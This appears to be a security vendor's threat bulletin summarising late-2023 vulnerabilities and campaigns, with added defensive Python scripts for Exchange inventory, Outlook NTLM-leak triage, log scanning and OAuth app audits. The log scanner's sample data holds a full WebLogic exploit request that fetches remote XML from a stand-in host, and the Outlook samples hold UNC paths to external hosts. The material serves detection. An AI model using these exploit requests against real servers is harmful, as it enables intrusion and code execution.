BLOG

Threat Bulletin | December 28

In our Threat Bulletins, our highly skilled Security Operations Center (SOC) team has meticulously analyzed and summarized the top threats that have been monitored over the past several weeks. Stay one step ahead of the adversaries as we delve into the ever-evolving landscape of cyber threats, uncover their tactics, and equip you with the knowledge to fortify your defenses against them.

Threat 1: Active Exploitation of Zero-Day Vulnerability (CVE-2023-6345) in Google Chrome

Sources: 

 

Entities:  

  • Google Chrome 
  • Skia Graphics Library

 

Indicators of Compromise:  

  • CVE-2023-6345

 

Attack Vectors:  

  • Web Browser Exploitation
  • Integer Overflow in Skia Graphics Library

 

Impact:  

  • Active Exploitation in the Wild
  • Potential for Remote Code Execution
  • Information Disclosure

 

Detailed Description: 

  • Google has released security updates for Chrome, fixing seven vulnerabilities, including a zero-day (CVE-2023-6345) actively exploited in the wild.
  • The flaw is categorized as an integer overflow bug in the Skia 2D graphics library.
  • The search giant has credited the discovery to its Threat Analysis Group.
  • While Google has acknowledged the existence of an exploit, specific details about the ongoing attacks and threat actors involved have not been disclosed.
  • Users are advised to upgrade to Chrome version 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux to mitigate potential threats.
  • Users of Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi should also apply the fixes when available.

 

Recommendations: 

  • Users should immediately update their Google Chrome browsers to version 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux.
Threat 2: Vulnerable Microsoft Exchange Servers Exposed to Attacks

Sources: 

 

Entities: 

  • Microsoft Exchange Servers

 

Indicators of Compromise:  

  • CVE-2020-0688 
  • CVE-2021-26855 (ProxyLogon) 
  • CVE-2021-27065 (part of the ProxyLogon exploit chain) 
  • CVE-2022-41082 (part of the ProxyNotShell exploit chain) 
  • CVE-2023-21529 
  • CVE-2023-36745 
  • CVE-2023-36439 

 

Attack Vectors: 

  • Remote code execution on outdated Microsoft Exchange servers

 

Impact:  

  • Tens of thousands of Microsoft Exchange servers in Europe, the U.S., and Asia are exposed to attacks due to running unsupported software versions, making them vulnerable to multiple security issues, some critical.

 

Detailed Description: 

  • According to the ShadowServer Foundation, over 20,000 Microsoft Exchange servers that have reached end-of-life (EoL) are exposed on the public internet.
  • The ShadowServer Foundation’s statistics show a significant number of vulnerable servers, with the majority located in Europe.
  • According to Shodan scans by Macnica security researcher Yutaka Sejiyama, in late November there were 30,635 machines on the public web running an unsupported version of Microsoft Exchange: 
    • 275 instances of Exchange Server 2007
    • 4,062 instances of Exchange Server 2010
    • 26,298 instances of Exchange Server 2013
  • Machines running older versions of the Exchange mail server are vulnerable to ProxyLogon, a critical security issue tracked as CVE-2021-26855, that can be chained with a less severe bug identified as CVE-2021-27065 to achieve remote code execution.

 

Recommendations:  

  • Organizations should urgently move their Microsoft Exchange servers to versions that are currently supported and still receive security updates. Note that Exchange Server 2013 reached end of support on April 11, 2023, so installing the last available cumulative update on a 2013, 2010 or 2007 server does not make it supported; those servers need to be migrated to Exchange Server 2019 (or Exchange Online) and then decommissioned.
  • Mitigations alone may not be sufficient; Microsoft recommends prioritizing the installation of updates on externally facing servers.
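
As an added illustration (not part of the bulletin and not Microsoft's tooling), the following Python script turns the inventory check above into something repeatable: it parses the AdminDisplayVersion string that Get-ExchangeServer reports for each server, maps it to a product, and lists every server whose product is past Microsoft's published end of extended support. The inventory in the script is constructed and its build numbers are illustrative.

```python
"""Classify Exchange Server builds by support status.

Added example, not from the bulletin or Microsoft. It parses the
AdminDisplayVersion string that `Get-ExchangeServer` returns (the same
"Version 15.0 (Build 1497.48)" shape appears in server banners), maps the
major.minor to a product, and reports servers whose product is past
Microsoft's published end of extended support. The inventory below is
constructed; build numbers are illustrative.
"""
import re
from datetime import date

# Product and end-of-extended-support date, keyed by version major (and minor
# where one major covers several products). Exchange 2007 is 8.x, 2010 is 14.x,
# 2013/2016/2019 are 15.0/15.1/15.2. Caveat: Exchange Server SE (2025) also
# reports 15.2 and would need the build number to be told apart; not done here.
PRODUCTS = {
    (8, None): ("Exchange Server 2007", date(2017, 4, 11)),
    (14, None): ("Exchange Server 2010", date(2020, 10, 13)),
    (15, 0): ("Exchange Server 2013", date(2023, 4, 11)),
    (15, 1): ("Exchange Server 2016", date(2025, 10, 14)),
    (15, 2): ("Exchange Server 2019", date(2025, 10, 14)),
}

VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\s+\(Build\s+(\d+)\.(\d+)\)")
BULLETIN_DATE = date(2023, 12, 28)  # reference "today" for the worked run


def classify(admin_display_version, today):
    """Return product, end-of-support date and whether it is still serviced."""
    m = VERSION_RE.search(admin_display_version)
    if not m:
        return {"product": "unknown", "end_of_support": None, "supported": None}
    major, minor = int(m.group(1)), int(m.group(2))
    product, eos = (PRODUCTS.get((major, minor))
                    or PRODUCTS.get((major, None))
                    or ("unknown", None))
    return {
        "product": product,
        "end_of_support": eos,
        "supported": None if eos is None else today <= eos,
    }


def unsupported_servers(inventory, today):
    """Sorted names of servers whose product is out of support. Versions that
    do not parse are included on purpose so they get reviewed, not skipped."""
    return sorted(name for name, version in inventory.items()
                  if classify(version, today)["supported"] is not True)


# Constructed inventory, e.g. from:
#   Get-ExchangeServer | Select-Object Name, AdminDisplayVersion
SAMPLE_INVENTORY = {
    "MAIL01": "Version 15.2 (Build 1258.12)",  # Exchange 2019
    "MAIL02": "Version 15.0 (Build 1497.48)",  # Exchange 2013, EoL April 2023
    "LEGACY": "Version 14.3 (Build 123.4)",    # Exchange 2010 SP3
    "OLD": "Version 8.3 (Build 83.6)",         # Exchange 2007 SP3
    "EDGE": "unknown banner",                  # unparseable: surfaced for review
}

if __name__ == "__main__":
    for name, version in SAMPLE_INVENTORY.items():
        print(name, classify(version, BULLETIN_DATE))
    print("Out of support:", unsupported_servers(SAMPLE_INVENTORY, BULLETIN_DATE))
```

Run it against the real output of Get-ExchangeServer (or a Shodan export) and feed the result into the migration plan; anything that lands in the unsupported list, including servers whose version string could not be parsed, needs a human look rather than a patch.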
Threat 3: Microsoft Warns of Kremlin-Backed APT28 Exploiting a Critical Outlook Vulnerability

Sources: 

 

Entities: 

  • Microsoft 
  • APT28 (Forest Blizzard) 
  • Exchange servers 

 

Indicators of Compromise:  

  • CVE-2023-23397 
  • Forest Blizzard (formerly Strontium) 
  • Net-NTLMv2 hash 
  • wpgate.zip 

 

Attack Vectors:  

  • Exploitation of Critical Security Flaw (CVE-2023-23397) in Microsoft Outlook 

 

Impact:  

  • Unauthorized access to Exchange server accounts, potential compromise of mailboxes in public and private entities, long-term persistence through folder permission modifications. 

 

Detailed Description: 

  • APT28, known as Forest Blizzard, is leveraging a critical security flaw (CVE-2023-23397) in Microsoft Outlook, as reported by Microsoft and the Polish Cyber Command.  
  • The goal is unauthorized access to Exchange server accounts, with the threat actor subsequently modifying folder permissions to ensure prolonged access to compromised mailboxes.  
  • Microsoft patched the flaw in March 2023; the ongoing activity targets systems that remain unpatched and aligns with previous disclosures of Russia-backed attacks exploiting it. 

 

Recommendations: 

  1. For organizations leveraging on-premises Microsoft Exchange Server, apply the latest security updates to ensure that defense-in-depth mitigations are active. 
  2. Use multifactor authentication to mitigate the impact of potential Net-NTLMv2 Relay attacks. NOTE: This will not prevent a threat actor from leaking credentials and cracking them offline. 
  3. Disable unnecessary services on Exchange. 
  4. Limit SMB traffic by blocking connections on ports 135 and 445 from all inbound IP addresses except those on a controlled allowlist. Because the exploit leaks the Net-NTLMv2 hash outbound, to an attacker-controlled SMB server named in the reminder path, also block outbound TCP 445 from the network to the internet. 
  5. Review the following article provided by Microsoft to effectively investigate internally for your organization if needed. 
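
The bullet points above describe the mechanism and the mitigations; the following Python script is an added example (not Microsoft's CVE-2023-23397.ps1 and not code from the bulletin) of the hunt a SOC runs afterwards. It takes the PidLidReminderFileParameter value exported from each mail, appointment and task item, extracts the host a UNC or WebDAV path points at, and ranks hosts outside the organisation first. The exported items are constructed and the internal DNS suffix is an assumption.

```python
"""Triage mailbox items whose reminder sound points at a remote host.

Added example, not Microsoft's CVE-2023-23397 script. The exploit sets the
extended MAPI property PidLidReminderFileParameter on a mail, appointment or
task item to a \\attacker\share path; when the reminder fires, Outlook opens
the path over SMB and authenticates, leaking the user's Net-NTLMv2 hash. A
hunt therefore lists every item where that property names a host and ranks
hosts outside the organisation first. The items below are constructed; the
internal DNS suffix is an assumption.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

INTERNAL_SUFFIXES = (".corp.example",)  # assumption: your internal DNS suffixes

# \\host\share\file or \\host (UNC), and file:// or http(s):// (WebDAV) forms.
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")
URL_RE = re.compile(r"^(?:file|https?)://([^/]+)(?:/|$)", re.IGNORECASE)

# Only RFC 1918, loopback and link-local count as internal; documentation
# ranges such as 203.0.113.0/24 are deliberately treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def reminder_host(value: Optional[str]) -> Optional[str]:
    """Host named by a reminder path, or None for empty/local paths (C:\\...)."""
    if not value:
        return None
    m = UNC_RE.match(value) or URL_RE.match(value)
    if not m:
        return None
    host = m.group(1).lower()
    host = re.sub(r"@\d+$", "", host)  # \\host@80\dav WebDAV-over-HTTP form
    host = host.split("@")[-1]          # user@host in URL form
    return host.split(":")[0]           # drop :port (IPv6 literals not handled)


def is_external(host: str) -> bool:
    """True when the host is an IP outside INTERNAL_NETS or a dotted name
    outside INTERNAL_SUFFIXES. Single-label names resolve internally."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host and not host.endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)


@dataclass
class Item:
    mailbox: str
    subject: str
    item_class: str                          # IPM.Note, IPM.Appointment, IPM.Task
    reminder_file_parameter: Optional[str]   # PidLidReminderFileParameter value


def triage(items: List[Item]) -> List[Tuple[str, str, str, str]]:
    """(mailbox, subject, host, verdict) for each item naming a remote host,
    EXTERNAL hosts first."""
    findings = []
    for it in items:
        host = reminder_host(it.reminder_file_parameter)
        if host is None:
            continue
        verdict = "EXTERNAL" if is_external(host) else "internal"
        findings.append((it.mailbox, it.subject, host, verdict))
    return sorted(findings, key=lambda f: f[3] != "EXTERNAL")


# Constructed export; in practice the property comes from Microsoft's
# CVE-2023-23397.ps1 output or an EWS/Graph extended-property query.
SAMPLE_ITEMS = [
    Item("alice@corp.example", "Team sync", "IPM.Appointment", None),
    Item("bob@corp.example", "Budget review", "IPM.Task", r"\\203.0.113.45\pub\r.wav"),
    Item("carol@corp.example", "Reminder", "IPM.Note", r"\\fs01.corp.example\music\ding.wav"),
    Item("dave@corp.example", "Invoice", "IPM.Appointment", r"C:\Windows\Media\chimes.wav"),
    Item("erin@corp.example", "Call", "IPM.Appointment", r"\\192.0.2.7@80\dav\x.wav"),
]

if __name__ == "__main__":
    for mailbox, subject, host, verdict in triage(SAMPLE_ITEMS):
        print(f"{verdict:8} {host:20} {mailbox} / {subject}")
```

Items flagged EXTERNAL are the ones to treat as exploitation attempts: the sending address, the host in the path and the time the reminder was due tell you which mailboxes may already have leaked a hash, so those accounts are the ones to reset and to check for the folder-permission changes described above.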

 

SOC Response: 

  • The SOC has created a custom detection for all clients, to look for the known indicators of compromise at this time.  
Threat 4: Atlassian Releases Fixes for Critical Software Vulnerabilities

Sources: 

 

Entities:  

  • Atlassian  
  • SnakeYAML library 
  • Confluence 
  • Jira Service Management 
  • Atlassian Companion app 

 

Indicators of Compromise 

  • CVE-2022-1471 
  • CVE-2023-22522 
  • CVE-2023-22523 
  • CVE-2023-22524 

 

Attack Vectors: 

  • Deserialization vulnerability 
  • Remote code execution in Confluence 
  • Template injection in Confluence 
  • Remote code execution in Assets Discovery 
  • Remote code execution in Atlassian Companion app 

 

Impact:  

  • Remote code execution 
  • Potential compromise of affected products 

 

Detailed Description: 

  • Atlassian has released critical software fixes for four vulnerabilities: 
    • CVE-2022-1471 (CVSS score: 9.8) – Deserialization vulnerability in the SnakeYAML library that can lead to remote code execution in multiple Atlassian products 
    • CVE-2023-22522 (CVSS score: 9.0) – Template injection vulnerability in Confluence Data Center and Confluence Server that allows an authenticated attacker, including one with anonymous access, to achieve remote code execution (affects all versions including and after 4.0.0) 
    • CVE-2023-22523 (CVSS score: 9.8) – Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server) 
    • CVE-2023-22524 (CVSS score: 9.6) – Remote code execution vulnerability in the Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0) 
  • Successful exploitation of any of these could lead to remote code execution on the affected host. 

 

Recommendations: 

  • Please review the following security advisories provided by Atlassian and take the necessary steps to fix these vulnerabilities as needed.
Threat 5: Apple Patches Critical iOS and macOS Security Flaws

Sources: 

 

Entities:  

  • Apple OS 
    • iOS 
    • iPadOS 
    • macOS 
    • tvOS 
    • watchOS 
  • Security Updates 

 

Attack Vectors:  

  • Exploitation of multiple security vulnerabilities 
  • Including keystroke injection (CVE-2023-45866) 
  • WebKit flaws (CVE-2023-42890, CVE-2023-42883) 

 

Impact:  

  • Arbitrary code execution 
  • Denial-of-Service (DoS) 
  • Sensitive data exposure 

 

Detailed Description: 

  • Apple’s security updates address 12 vulnerabilities in iOS and iPadOS, spanning various components, and resolve 39 shortcomings in macOS Sonoma 14.2. Safari 17.2 fixes WebKit flaws. 
  • Notable vulnerabilities include CVE-2023-45866, a critical issue allowing keystroke injection, and WebKit flaws (CVE-2023-42890, CVE-2023-42883) with the potential for arbitrary code execution and DoS.  
  • The updates also address actively exploited WebKit vulnerabilities (CVE-2023-42916, CVE-2023-42917).  
  • A Siri bug in iOS 17.2 and iPadOS 17.2 is fixed, and a Contact Key Verification security upgrade is introduced to enhance iMessage conversation privacy. 

 

Recommendations: 

  • Users are advised to update their Apple devices promptly to the latest software versions. Please review the following Apple Support article to determine if your device requires any necessary updates. 
Threat 6: Critical WordPress Plugin Vulnerability (CVE-2023-6553) Exposes 50K Sites to RCE Attacks

Sources: 

 

Entities:  

  • WordPress 
  • Backup Migration Plugin 

 

Attack Vectors:  

  • Remote Code Execution (RCE) via PHP code injection 

 

Impact:  

  • Complete compromise of vulnerable websites 
  • Arbitrary PHP code execution 
  • Unauthorized access 

 

Detailed Description: 

  • A critical vulnerability (CVE-2023-6553) in the Backup Migration WordPress plugin allows unauthenticated attackers to achieve remote code execution, potentially resulting in the complete compromise of vulnerable websites.  
  • The flaw arises from PHP code injection via the /includes/backup-heart.php file.  
  • Exploitation is possible through specially crafted requests, enabling threat actors to include arbitrary, malicious PHP code and execute arbitrary commands on the server in the context of the WordPress instance.  
  • Despite a prompt patch release (version 1.3.8) by BackupBliss, a significant number of WordPress sites using vulnerable versions are yet to be secured. 

 

Recommendations: 

  • WordPress administrators are strongly advised to update the Backup Migration plugin to the patched version 1.3.8 promptly to mitigate the risk of exploitation.
Threat 7: Oracle WebLogic Server Vulnerability Exploited by 8220 Gang to Spread Malware

Sources: 

 

Entities: 

  • 8220 Gang 
  • Oracle WebLogic Server 
  • CVE-2020-14883 

 

Attack Vectors:  

  • CVE-2020-14882 (an authentication bypass vulnerability in the Oracle WebLogic Server administration console, chained with CVE-2020-14883) 

 

Impact:  

  • Compromised servers 
  • Execution of malicious code 
  • Deployment of stealer and coin mining malware 
  • Potential data theft 
  • Unauthorized access 

 

Detailed Description: 

  • The 8220 Gang is actively exploiting a high-severity vulnerability (CVE-2020-14883) in Oracle WebLogic Server to spread malware.  
  • This flaw allows remote authenticated attackers to execute code, and it is commonly used in combination with other vulnerabilities like CVE-2020-14882 or leaked credentials.  
  • The attackers craft XML files to exploit CVE-2020-14883, leading to the deployment of stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.  
  • The group targets a range of sectors, including healthcare, telecommunications, and financial services, across different countries.  

 

Recommendations: 

  • Organizations using Oracle WebLogic Server should apply the fixes from Oracle’s October 2020 Critical Patch Update (referenced in the following Oracle Patch Advisory), and any later CPU, to mitigate the risks associated with CVE-2020-14882 and CVE-2020-14883. Since the vulnerable administration console has no business being reachable from the internet, also restrict access to /console to trusted management networks. 
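
Both this threat and Threat 6 leave a characteristic request in ordinary web-server access logs, so one detection example serves both. The Python below is an added example, not code from the bulletin or from the vendors' write-ups: it parses combined-format log lines and tags requests for the Backup Migration plugin's /includes/backup-heart.php (CVE-2023-6553), requests that reach the WebLogic console through a double-encoded ../ traversal (the publicly documented CVE-2020-14882 bypass shape) and handle= parameters that name a FileSystemXmlApplicationContext or ShellSession (the shape that delivers the crafted XML for CVE-2020-14883). The log lines are constructed; the plugin directory name in them is assumed.

```python
"""Scan web-server access logs for the request shapes used against the
Backup Migration plugin (CVE-2023-6553) and the WebLogic console
(CVE-2020-14882 / CVE-2020-14883).

Added example, not from the bulletin, Wordfence, Imperva or Oracle. Rules:
  - CVE-2023-6553: any direct request for /includes/backup-heart.php, the
    file the bulletin names (plugin directory name in the sample is assumed).
  - CVE-2020-14882: a path under /console/ that reaches another console
    resource through an (often double-URL-encoded) ../ traversal, the publicly
    documented authentication-bypass shape.
  - CVE-2020-14883: a handle= parameter carrying a
    FileSystemXmlApplicationContext (remote XML bean definition) or
    ShellSession payload, the shape that delivers the crafted XML.
Log lines are constructed, in Apache/nginx combined format.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3})'
)
# ../ or ..;/ or ..\ in clear, single-encoded (%2e%2e) or double-encoded (%252e%252e)
TRAVERSAL_RE = re.compile(r"\.\.(?:/|;/|\\)|%2e%2e|%252e%252e", re.IGNORECASE)
HANDLE_RE = re.compile(r"[?&]handle=", re.IGNORECASE)
PAYLOAD_RE = re.compile(r"FileSystemXmlApplicationContext|ShellSession", re.IGNORECASE)


def classify(target: str):
    """Return the CVE tags a request target (path?query) matches."""
    decoded = unquote(target)  # one decoding round; the raw form keeps %25 shapes
    path = decoded.split("?", 1)[0]
    tags = []
    if path.lower().endswith("/includes/backup-heart.php"):
        tags.append("CVE-2023-6553")
    if "/console/" in path.lower() and (TRAVERSAL_RE.search(target)
                                        or TRAVERSAL_RE.search(decoded)):
        tags.append("CVE-2020-14882")
    if HANDLE_RE.search(decoded) and PAYLOAD_RE.search(decoded):
        tags.append("CVE-2020-14883")
    return tags


def scan(lines):
    """Parse combined-format lines and return the ones that match a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "target": m["target"], "tags": tags})
    return hits


# Constructed sample log (plugin directory name assumed; client IPs taken from
# documentation ranges).
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Dec/2023:10:01:02 +0000] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Dec/2023:10:02:15 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://198.51.100.7/rce.xml%22) HTTP/1.1" 200 0',
    '192.168.1.5 - - [15/Dec/2023:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3200',
    '198.51.100.7 - - [15/Dec/2023:10:04:30 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["tags"]), hit["target"][:80])
```

A 200 on a tagged WebLogic request is the signal to escalate: the bypass alone returns the console page, and the handle= payload runs on the server before any response is written, so a successful status means the XML was fetched and you should pull the host for the mining and stealer artefacts named above rather than wait for further indicators.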
Threat 8: Microsoft Warns of Adversaries Exploiting OAuth for Cryptocurrency Mining and Phishing

Sources: 

 

Entities:  

  • OAuth applications 
  • Cryptocurrency Mining 
  • Phishing 

 

Attack Vectors:  

  • Phishing 
  • Password-spraying 
  • Compromised user accounts 

 

Impact:  

  • Cryptocurrency mining 
  • Email phishing attacks 
  • Business Email Compromise (BEC) fraud 
  • Session cookie theft 
  • Use of OAuth applications to send spam emails 

 

Detailed Description: 

  • Microsoft has identified adversaries, particularly Storm-1283, exploiting OAuth applications to automate virtual machine deployment for cryptocurrency mining and launch phishing attacks.  
  • Compromised user accounts are used to create or modify OAuth applications, enabling threat actors to maintain persistence and conduct various malicious activities, such as email phishing with an adversary-in-the-middle (AiTM) kit.  
  • The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account. 

 

Recommendations: 

  • Organizations are advised to enforce multi-factor authentication (MFA), enable conditional access policies, regularly audit applications and the permissions consented to them, and restrict which users can grant consent to applications (for example by requiring an admin consent workflow) to mitigate the risks associated with OAuth-based attacks.
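
As an added example (not Microsoft's hunting queries and not code from the bulletin), the Python below scores a tenant's OAuth app registrations against the three patterns described above: a credential added to an app by an account that was password-sprayed or phished, mail or directory permissions on an app that is not from a verified publisher, and an Azure role such as Contributor that lets the app deploy virtual machines for mining. The records are constructed and the field names are the example's own; in practice they come from Entra ID app and service-principal exports and Azure role assignments.

```python
"""Score OAuth app registrations for the abuse patterns Microsoft describes.

Added example, not Microsoft's hunting queries. Each record is what you would
pull from the tenant (Entra ID app registrations and service principals, plus
Azure role assignments); the records below are constructed and the field names
are this example's own. Three signals are scored: a credential (secret or
certificate) added by an account known or suspected to be compromised, mail or
directory permissions on an app that is not from a verified publisher, and a
subscription role such as Contributor that lets the app deploy virtual machines.
"""
from datetime import date, timedelta

HIGH_RISK_PERMISSIONS = {
    "Mail.Send", "Mail.ReadWrite", "Mail.Read", "full_access_as_app",
    "EWS.AccessAsUser.All", "Directory.ReadWrite.All", "Application.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}
DEPLOY_ROLES = {"Owner", "Contributor", "Virtual Machine Contributor"}
REFERENCE_DATE = date(2023, 12, 28)  # "today" for the worked run
LOOKBACK_DAYS = 30                    # how recent a new credential must be to matter


def audit_apps(apps, compromised_users, today=REFERENCE_DATE):
    """Return {app name: {"priority": "high"|"medium", "reasons": [...]}}
    for every app that trips at least one rule."""
    cutoff = today - timedelta(days=LOOKBACK_DAYS)
    findings = {}
    for app in apps:
        reasons = []
        for cred in app.get("credentials", []):
            added = date.fromisoformat(cred["added"])
            if cred["added_by"].lower() in compromised_users:
                reasons.append(f"credential added by compromised account "
                               f"{cred['added_by']} on {added}")
            elif added >= cutoff:
                reasons.append(f"credential added recently ({added}) by {cred['added_by']}")
        risky = sorted(HIGH_RISK_PERMISSIONS & set(app.get("permissions", [])))
        if risky and not app.get("publisher_verified", False):
            reasons.append("unverified publisher with high-risk permissions: "
                           + ", ".join(risky))
        roles = sorted(DEPLOY_ROLES & set(app.get("azure_roles", [])))
        if roles:
            reasons.append("can deploy compute (Azure roles: " + ", ".join(roles) + ")")
        if reasons:
            priority = ("high" if any("compromised" in r or "high-risk" in r
                                      for r in reasons) else "medium")
            findings[app["name"]] = {"priority": priority, "reasons": reasons}
    return findings


# Constructed tenant data. Accounts flagged by password-spray or phishing
# alerts go in COMPROMISED_USERS (lower-case UPNs).
COMPROMISED_USERS = {"j.doe@corp.example"}

SAMPLE_APPS = [
    {"name": "HR Portal", "publisher_verified": True, "permissions": ["User.Read"],
     "credentials": [{"added_by": "admin@corp.example", "added": "2022-03-01"}]},
    {"name": "vm-autoscaler", "publisher_verified": False, "permissions": [],
     "azure_roles": ["Contributor"],
     "credentials": [{"added_by": "j.doe@corp.example", "added": "2023-12-10"}]},
    {"name": "mailflow-helper", "publisher_verified": False,
     "permissions": ["Mail.Send", "Mail.ReadWrite"],
     "credentials": [{"added_by": "a.smith@corp.example", "added": "2023-12-20"}]},
    {"name": "Ticketing (vendor)", "publisher_verified": True,
     "permissions": ["Mail.Send"], "credentials": []},
]

if __name__ == "__main__":
    for name, finding in audit_apps(SAMPLE_APPS, COMPROMISED_USERS).items():
        print(f"[{finding['priority']}] {name}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The verified-publisher app with Mail.Send is deliberately left unflagged so the output stays short enough to act on; the point of the third bullet above is that an app which keeps a credential the attacker added survives the password reset of the account that was compromised, which is why the credential list, not just the user list, is what to review.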
Threat 9: Google Addresses Eighth Chrome Zero-Day Exploited in Attacks This Year

Sources: 

 

Entities:  

  • Google 
  • Zero-Day Exploit Fix 

 

Attack Vectors:  

  • Heap Buffer Overflow in WebRTC Framework  

 

Impact:  

  • State-sponsored attacks 
  • Exploitation in the wild 
  • Potential deployment of spyware 

 

Detailed Description: 

  • The zero-day vulnerability (CVE-2023-7024) is a heap buffer overflow weakness in the WebRTC framework used for Real-Time Communications (RTC) capabilities.  
  • Google acknowledges the exploitation of this vulnerability in the wild but has not disclosed specific details.  
  • The emergency update is available for Chrome users on Windows (120.0.6099.129/130) and Mac/Linux (120.0.6099.129).  
  • Google aims to restrict access to bug details to prevent threat actors from exploiting the vulnerability further. 

 

Recommendations: 

  • Users should immediately update Google Chrome to version 120.0.6099.129/130 for Windows or 120.0.6099.129 for macOS and Linux, and users of Chromium-based browsers should apply the corresponding fixes when available. 
Threat 10: Ivanti Addresses 13 Critical RCE Flaws in Avalanche MDM Solution

Sources: 

 

Entities:  

  • Ivanti 
  • Patches for critical Avalanche RCE flaws 

 

Attack Vectors: 

  • Unauthenticated Buffer Overflows 
  • Stack-based Buffer Overflows 
  • Null Pointer Dereference 

 

Impact:  

  • Remote Code Execution 
  • Denial of Service 

 

Detailed Description: 

  • Ivanti’s Avalanche MDM solution is affected by 13 critical security vulnerabilities, including unauthenticated buffer overflows and stack-based buffer overflows.
  • Attackers can exploit these flaws without user interaction, potentially leading to remote code execution or denial of service.  
  • Ivanti recommends that users update to the latest version, Avalanche 6.4.2, to address these vulnerabilities.
  • The company also patched eight medium- and high-severity bugs that could result in denial of service, remote code execution, and server-side request forgery (SSRF) attacks.

 

Recommendations: 

  • Organizations using Ivanti’s Avalanche MDM solution should immediately update to the latest version, Avalanche 6.4.2, to mitigate the risk of exploitation. 
  • Please review the following security advisory by Ivanti for additional information regarding these CVEs and the release notes for these patches.
Threat 11: FBI Disrupts BlackCat Ransomware, Releases Decryption Tool

Sources: 

 

Entities:  

  • U.S. Department of Justice (DoJ) 
  • Federal Bureau of Investigation (FBI) 
  • BlackCat  

 

Attack Vectors:  

  • Ransomware-as-a-Service (RaaS) 
  • Phishing attacks 

 

Impact:  

  • Over 1,000 victims affected, $300 million in estimated illegal revenues 

 

Detailed Description: 

  • The U.S. DoJ announced the disruption of BlackCat ransomware operations and the release of a decryption tool for affected victims.  
  • The FBI collaborated with multiple international law enforcement agencies to dismantle the gang’s infrastructure and obtain the key pairs used to host its Tor sites.  
  • BlackCat, the second most prolific RaaS after LockBit, has been active since December 2021 and writes its payloads in the Rust programming language.  
  • Affected victims saved approximately $68 million in ransom payments. 
  • Since the disruption, however, the BlackCat group has claimed that the FBI operation affected only a portion of its operations and, in response, has lifted its restrictions on affiliates, now permitting attacks on hospitals, power plants, and critical infrastructure. 

 

Recommendations: 

  • Any previously affected victims are advised to use the provided decryption tool to regain access to locked files.  
  • Please review the following Stop Ransomware Guide provided by CISA to best mitigate the risk of Ransomware within your organization.